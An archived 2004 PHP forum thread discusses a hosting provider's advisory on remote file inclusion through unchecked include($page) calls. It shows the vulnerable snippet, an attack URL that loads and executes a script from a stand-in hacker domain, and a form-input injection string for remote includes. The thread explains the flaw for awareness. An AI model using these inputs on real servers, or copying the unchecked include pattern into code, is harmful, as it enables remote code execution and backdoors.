473,792 Members | 2,796 Online
Bytes | Software Development & Data Engineering Community
+ Post

Home Posts Topics Members FAQ

PHP blamed for security problems

Here's what this morning's security advisory read here:

``In the last 3 months we have noticed an marked increase in the number of
web-server attacks and successful compromise on our network. These are
mostly PHP-script exploits and are giving hackers easy shell access to
virtual servers, as mentioned in the PHP Security Advisory in the News
section of the control centre. We really cannot do much about these
network attacks other than to inform our customers to stay vigilant and
upgrade PHP-script software whenever newer versions become available.
The allow_url_open change to PHP is about as much as we can do here.''

They offer a more detailed description of the problem:

``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.

Following our own investigation of these hacked accounts, we
believe we have established the common point-of-entry for
these attacks.

As you may be aware, PHP provides a number of functions for
opening files such as 'fopen()' and it's also possible to
pass an HTTP or FTP URL to these such that
fopen('http://www.dsvr.co.uk/'); will fetch the contents of
the DSVR homepage for PHP to treat as a file.

What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.

Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>

as a cheap way to manage common headers and footers. These
pages can be accessed like so:

http://www.your-domain.co.uk/index.php?page=about.inc

so that a file 'about.inc' is included inside the standard
header/footer.

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''
--
__________
|im |yler http://timtyler.org/ ti*@tt1lock.org Remove lock to reply.
Jul 17 '05 #1
38 3227
> Many clients seem to be using PHP that looks like this:

<html>
...standard header...
<? include($page); ?>
...standard footer...
</html>


Sadly that's so true. It's a shame taint checking isn't available in php
to warn about that sort of thing.

It isn't php's fault as such. I've come across similar dynamic include
problems at regular intervals for years (dBase used to allow it and
could be royally screwed). It's just ten times worse when you can access
off-site files and execute in local context.

Jul 17 '05 #2
With total disregard for any kind of safety measures Kevin Thorpe
<ke***@pricetra k.com> leapt forth and uttered:
It isn't php's fault as such. I've come across similar dynamic
include problems at regular intervals for years (dBase used to
allow it and could be royally screwed). It's just ten times
worse when you can access off-site files and execute in local
context.


But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.

Ultimatly the security risk arises from shit programmers. Not the
language itself.

--
Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/
Jul 17 '05 #3
"Phil Roberts" <ph*****@HOLYfl atnetSHIT.net> wrote in message
news:Xn******** *************** **@216.196.97.1 32...
With total disregard for any kind of safety measures Kevin Thorpe
<ke***@pricetra k.com> leapt forth and uttered:
It isn't php's fault as such. I've come across similar dynamic
include problems at regular intervals for years (dBase used to
allow it and could be royally screwed). It's just ten times
worse when you can access off-site files and execute in local
context.


But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.

Ultimatly the security risk arises from shit programmers. Not the
language itself.

--
Phil Roberts | Dork Pretending To Be Hard | http://www.flatnet.net/

True it will not include the source, but only the output, you can write a
php script to output valid code.

an example would be:

<?php
print "<?php\n";
print "// do some evil here\n";
print "?>\n";
?>

and if you included this from another site it would apear to be valid code.

I agree that it is not a PHP concern, but a lack of forethought (hey, I am
guilty too, but I get to it) the same security risks are in perl as well.
they are just easier in php.

One of the biggest things I see, is people taking data from an input from,
and writing it to a file, the doing an incude() on it. just put <?php
include(http://www.bla.com/script.php); ?> into a form input box and your
good to go

Perhaps when we give examples we should also encourage the use of a bit of
security. and it helps when we point it out to each other as well, in fact
numerous people here Pedro, Chung, Tim, and many others, have pointed stuff
out to me. it helps all of us stay on our toes, and allows us to give better
examples that are not so sloppy.

--
Mike Bradley
http://www.gzentools.com -- free online php tools
Jul 17 '05 #4
Phil Roberts <ph*****@holyfl atnetshit.net> wrote:
<snip>
But if you include remote files via HTTP, then you are making a
HTTP request. You can't include source code from another server
because the HTTP response will not pass the code, only the output
from the code.


For the sake of others stumbling upon this post, it is completely wrong. I
think if Phil re-read this he'd realize why. (And if not, re-read the
original post and the URL of the sample malicous script.)

- Bill
Jul 17 '05 #5
On 2004-03-16, Tim Tyler <ti*@tt1lock.or g> wrote:
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.
And who's to blame for that? The php script? Or the sysadmin that gives
to many rights to the user that is running apache?
What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.
First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Again, if a local user has the rights to do all this stuff....
Then the admins should be fired for allowing this.
--
http://home.mysth.be/~timvw
Jul 17 '05 #6
On 17 Mar 2004 01:15:16 GMT, Tim Van Wassenhove hath writ:
On 2004-03-16, Tim Tyler <ti*@tt1lock.or g> wrote:
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.


And who's to blame for that? The php script? Or the sysadmin that gives
to many rights to the user that is running apache?
What you may not be aware of is that functions such as
include() also allow URLs to be passed as their argument.
Since these functions cause the included file to be parsed
and executed as PHP code, this can be a major security flaw.


First line in the manual (So people can't say they didn't know)
The include() statement includes and evaluates the specified file.
This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Again, if a local user has the rights to do all this stuff....
Then the admins should be fired for allowing this.


At a previous ISP -- who also was hosted my web site -- I noticed
one day that files I created/updated in PHP were assigned the
ownerid of ---- *me* -- my logonid for the hosting machine!
Crap!! I was also trying to use some secure (userid:passwor d)
http access to some things inside my account -- using file
ownerships to control access to some data.
I pointed this out to the 'web master', and asked "Why!?".
I never got a reply, but several days later I noticed the PHP
program(s) were no longer creating files with owner: my-userid.
Instead, they were ownerid: *root* !!! Geez-Zuss!!!
I moved my account(s) the next day.

Jonesy
--
| Marvin L Jones | jonz | W3DHJ | OS/2
| Gunnison, Colorado | @ | Jonesy | linux __
| 7,703' -- 2,345m | config.com | DM68mn SK
Jul 17 '05 #7
"Allodoxaphobia " <bi********@con fig.com> wrote in message
news:sl******** *************** @localhost.conf ig.com...
I never got a reply, but several days later I noticed the PHP
program(s) were no longer creating files with owner: my-userid.
Instead, they were ownerid: *root* !!! Geez-Zuss!!!
I moved my account(s) the next day.

Jonesy
--
| Marvin L Jones | jonz | W3DHJ | OS/2
| Gunnison, Colorado | @ | Jonesy | linux __
| 7,703' -- 2,345m | config.com | DM68mn SK


Wait, dont go away, what hosting company? :)

(just kidding)

--
Mike Bradley
http://www.gzentools.com -- free online php tools
Jul 17 '05 #8
Here's what this morning's security advisory read here:
``Recently, we've seen an increase in malicious activity on
our servers, caused by hackers who have successfuly gained
shell access via insecure PHP scripts.


And who's to blame for that? The php script? Or the sysadmin that gives
to many rights to the user that is running apache?


I tend to agree with you here. The fact that the user makes
mistakes/(oversights?) is not a reflection on how php works.
Every application, from Windows to Linux can have their basic securities
bypassed by user actions, (i can drop my firewalls, leave the user name as
'Administrator' and so forth).
I would go as far as saying that php *itself* is very secure.

Maybe php could prevent the usage of include(...) from a $_GET/$_POST but
how can that really be enforced...

I have been wanting to write an app for some times that go thru php scripts
and flags possible security risks. I don't know if i really have the time
to.

Simon.
Jul 17 '05 #9
Tim Tyler <ti*@tt1lock.or g> wrote in message news:<Hu******* *@bath.ac.uk>.. .
<snip>

However, unless the $page variable is checked for valid
content -- and input sanity checking is conspicuously absent
in many PHP scripts we encounter -- this is very open to
misuse. Malicious third parties could do the following:

http://www.your-domain.co.uk/index.p...oot-script.txt

This example would cause
http://www.hacker-domain.co.uk/my-root-script.txt
to be downloaded and executed as PHP, allowing the hacker to
manipulate server files and create backdoors which allow
them to log in using telnet or ssh and cause further
disruption.''


Blame the design and programmers---not the PHP.

In India, we can file a case against anyone who damage one's name
with a kind of hoax. I don't know, whether we should take some efforts
to sue such people who intentionally damage PHP instead of blaming the
design and programmers.

--
http://www.sendmetoindia.com - Send Me to India!
Email: rrjanbiah-at-Y!com
Jul 17 '05 #10

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics
5
1890
[PHP5] Will be security be enforced ?
by: Julien Buratto | last post by:
I don't think Php, setting safe_mode and register globals did a serious job on 4.1.x versions and above. Actually I would like to see that crapy problems beeing solved on Php5 but it seems nobody is thinking of it... Any idea ? Julien
PHP
0
1421
Security in data handling
by: Ken in Melbourne Australia | last post by:
For some Open Source (GPL licensed) programs that I am working on, I am trying to create some PHP routines for data handling with good security. The routines I have created for this are given below and I would like these reviewed for security problems or other problems that they may have. My requirements are as follows:
PHP
4
5430
[HELP] RMI & Java security (too secure!)
by: Lorenzo | last post by:
hi you all, first of all apologies for having cross-posted this message but really i did not know where to post it. please let me know what ng you consider the most suitable for the described issue. i wrote a program made by a client and a server that communicate via RMI premise 1) everything has been developed and executed on WinXP Professional and the following jre
Java
354
15928
c# is a good way to learn c
by: Montrose... | last post by:
After working in c# for a year, the only conclusion I can come to is that I wish I knew c. All I need is Linux, the gnu c compiler and I can do anything. Web services are just open sockets hooked up to interfaces. The Gtk is more than enough gui.
.NET Framework
116
7557
Security - more complex than I thought
by: Mike MacSween | last post by:
S**t for brains strikes again! Why did I do that? When I met the clients and at some point they vaguely asked whether eventually would it be possible to have some people who could read the data and some who couldn't but that it wasn't important right now. And I said, 'sure, we can do that later'. So now I've developed an app without any thought to security and am trying to apply it afterwards. Doh!, doh! and triple doh!
Microsoft Access / VBA
3
1868
Access 2002 security
by: mar10 | last post by:
I am creating a database in Access 2002 for a small firm that would like security on the tables. They want some employees to have write access only to tables, while others read-only. I have not done anything with security since way back in version '97. I'm reading some white papers I've found to gain knowledge of current security issues. My question is, can I create security problems with other access programs I have created as I...
Microsoft Access / VBA
7
1988
IIS / Web Services Security threats
by: Magdelin | last post by:
Hi, My security team thinks allowing communication between the two IIS instances leads to severe security risks. Basically, we want to put our presentation tier on the perimeter network and the business tier inside the fire wall or internal network. The biz tier will be developed and deployed as web services on IIS. I know microsoft recommends this architecture but I am not able to convince my security team. They say IIS is vulnerable...
.NET Framework
15
10514
Security - PHP Vs Java
by: himilecyclist | last post by:
My State government organization has written a PHP/MySQL application which has been in production for about 6 months and has been highly successful. We are now embarking on a similar database application, but one with much higher security concerns (birth data). Prior to beginning the project, we met with an oversight committee who strongly advised against PHP and suggested Java. Their concern was that PHP could not be trusted to...
PHP
1
1211
Re: bad software blamed for bad quarter / are programmers obsolete?
by: Peter Morris | last post by:
The problems with software development these days as I see them are 01: Hiring crap coders. Some companies seem as though they like to fill seats or something and will hire someone with very poor skills. 02: Unrealistic deadlines. People rarely seem to plan for the unexpected these days. They seem to give an estimate of how long something should take if everything goes to plan, which never happens. 03: Coders not speaking out or...
C# / C Sharp
0
9670
marktang
What is ONU?
by: marktang | last post by:
ONU (Optical Network Unit) is one of the key components for providing high-speed Internet services. Its primary function is to act as an endpoint device located at the user's premises. However, people are often confused as to whether an ONU can Work As a Router. In this blog post, we’ll explore What is ONU, What Is Router, ONU & Router’s main usage, and What is the difference between ONU and Router. Let’s take a closer look ! Part I. Meaning of...
General
0
9518
Changing the language in Windows 10
by: Hystou | last post by:
Most computers default to English, but sometimes we require a different language, especially when relocating. Forgot to request a specific language before your computer shipped? No problem! You can effortlessly switch the default language on Windows 10 without reinstalling. I'll walk you through it. First, let's disable language synchronization. With a Microsoft account, language settings sync across devices. To prevent any complications,...
Windows Server
0
10430
Oralloy
Problem With Comparison Operator <=> in G++
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers, it seems that the internal comparison operator "<=>" tries to promote arguments from unsigned to signed. This is as boiled down as I can make it. Here is my compilation command: g++-12 -std=c++20 -Wnarrowing bit_field.cpp Here is the code in...
C / C++
0
10000
tracyyun
Discussion: How does Zigbee compare with other wireless protocols in smart home applications?
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each protocol has its own unique characteristics and advantages, but as a user who is planning to build a smart home system, I am a bit confused by the choice of these technologies. I'm particularly interested in Zigbee because I've heard it does some...
General
0
9033
agi2029
AI Job Threat for Devs
by: agi2029 | last post by:
Let's talk about the concept of autonomous AI software engineers and no-code agents. These AIs are designed to manage the entire lifecycle of a software development project—planning, coding, testing, and deployment—without human intervention. Imagine an AI that can take a project description, break it down, write the code, debug it, and then launch it, all on its own.... Now, this would greatly impact the work of software developers. The idea...
Career Advice
0
6776
Couldn’t get equations in html when convert word .docx file to html file in C#.
by: conductexam | last post by:
I have .net C# application in which I am extracting data from word file and save it in database particularly. To store word all data as it is I am converting the whole word file firstly in HTML and then checking html paragraph one by one. At the time of converting from word file to html my equations which are in the word document file was convert into image. Globals.ThisAddIn.Application.ActiveDocument.Select();...
C# / C Sharp
0
5560
Windows Forms - .Net 8.0
by: adsilva | last post by:
A Windows Forms form does not have the event Unload, like VB6. What one acts like?
Visual Basic .NET
1
4111
transfer the data from one system to another through ip address
by: 6302768590 | last post by:
Hai team i want code for transfer the data from one system to another through IP address by using C# our system has to for every 5mins then we have to update the data what the data is updated we have to send another system
C# / C Sharp
3
2917
bsmnconsultancy
Comprehensive Guide to Website Development in Toronto: Expert Insights from BSMN Consultancy
by: bsmnconsultancy | last post by:
In today's digital era, a well-designed website is crucial for businesses looking to succeed. Whether you're a small business owner or a large corporation in Toronto, having a strong online presence can significantly impact your brand's success. BSMN Consultancy, a leader in Website Development in Toronto offers valuable insights into creating effective websites that not only look great but also perform exceptionally well. In this comprehensive...
General

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.

BYTES.COM © 2024
About Bytes
Terms Of Use
Privacy Policy
Sitemap
Advertise on Bytes
How to Post and Respond on Bytes
How to Promote and Link on Bytes
How to increase your Ranking on Bytes
Become a Recognized Expert on Bytes
Feedback Welcomed! Contact Us